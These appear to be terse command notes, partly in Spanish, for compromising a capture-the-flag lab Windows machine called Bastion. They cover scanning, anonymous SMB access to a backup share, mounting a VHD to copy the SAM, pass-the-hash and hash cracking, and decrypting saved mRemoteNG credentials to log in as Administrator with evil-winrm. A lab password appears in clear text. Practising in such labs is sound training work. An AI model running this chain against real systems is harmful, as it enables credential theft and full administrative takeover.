nmap -A -p- -oA secnotes 10.129.178.250 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA secnotes 10.129.178.250

nmap -sU -O -p- -oA secnotes-udp 10.129.178.250

nikto -h 10.129.178.250:80

crackmapexec smb 10.129.1.39

smbclient //10.129.1.39/Backups -N

sudo mkdir /mnt/smb

mount -t cifs "//10.129.1.39/Backups" /mnt/smb

cd /mnt/smb

tree

sudo rmmod nbd

sudo modprobe nbd

ls /dev

sudo qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

sudo mount /mnt/vhd

sudo mkdir /mnt/vhd

sudo mount /dev/nbd0p1 /mnt/vhd

No encontramos user.txt

Nos dirigimos al directorio config

Tratamos de hacer una copia del SAM

crackmapexec smb bastion.htb -u 'Administrator' -H '31d6c...'

crackmapexec smb bastion.htb -u 'L4mpje' -H '2611...'

crackmapexec winrm bastion.htb -u 'L4mpje' -H '2611...'

la contrasena bureaulampje

john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=NT

ssh L4mpje@bastion.htb

whoami /priv

whoami /all

Vemos el mRemoteNG

cd C:\PROGRA~2

cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG

type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

git clone https://github.com/haseebT/mRemoteNG-Decrypt

python mremoteng_decrypt.py -s 'aEWNFVS...'

Conseguimos las credenciales-> Administrator:thXLHM96BeKL0ER2

crackmapexec smb bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'

evil-winrm -i bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'